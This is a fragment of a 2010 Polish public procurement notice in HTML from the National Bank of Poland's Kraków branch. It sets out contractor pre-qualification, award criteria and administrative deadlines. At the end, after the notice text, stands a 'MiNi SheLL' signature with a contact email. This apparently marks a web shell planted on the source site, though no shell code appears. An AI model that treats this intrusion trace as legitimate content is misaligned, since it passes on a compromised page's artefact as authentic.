2. W sytuacji, gdy wymagane warunki spełni mniej niż 5 wykonawców, zamawiający zaprosi do składania ofert wszystkich tych wykonawców.
3. W sytuacji, gdy wymagane warunki spełni więcej niż 5 wykonawców, zamawiający zaprosi do składania ofert tych 5 wykonawców, którzy otrzymają najwyższe oceny spełnienia warunku Wiedza i doświadczenie, określonego w sekcji III.3.2.
4. Ocena stopnia spełnienia tego warunku polegać będzie na porównaniu łącznej wielkości zsumowanych powierzchni, na których usługi były lub są wykonywane przez każdego wykonawcę.
5. W przypadku osiągnięcia przez dwóch lub więcej wykonawców takiej samej oceny stopnia spełnienia warunku określonego w pkt. 4, o kolejności zakwalifikowania decydować będzie łączna liczba usług wykonanych lub wykonywanych w ramach jednego zamówienia ( kontraktu) o wartości nie mniejszej niż 120.000 zł brutto i jednocześnie powierzchni nie mniejszej niż 2.500 m2 przez każdego wykonawcę.
6. W przypadku, gdy dwóch lub więcej wykonawców, po dokonaniu oceny w sposób opisany w pkt. 4 i 5, w równym stopniu spełni warunek Wiedza i doświadczenie, co w konsekwencji uniemożliwi wyłonienie 5 wykonawców, którzy w najwyższym stopniu spełnią ten warunek, zamawiający zaprosi do udziału w postępowaniu wszystkich tych wykonawców.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w opisie przedmiotu zamówienia, w tym przewiduje zmiany danych liczbowych zawartych w opisie (w zakresie dopuszczonym przepisami ustawy Prawo zamówień publicznych i przepisów innych ustaw).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Bank Polski Oddział Okręgowy w Krakowie, ul. Basztowa 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2010 godzina 10:00, miejsce: Narodowy Bank Polski Oddział Okręgowy w Krakowie, ul. Basztowa 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com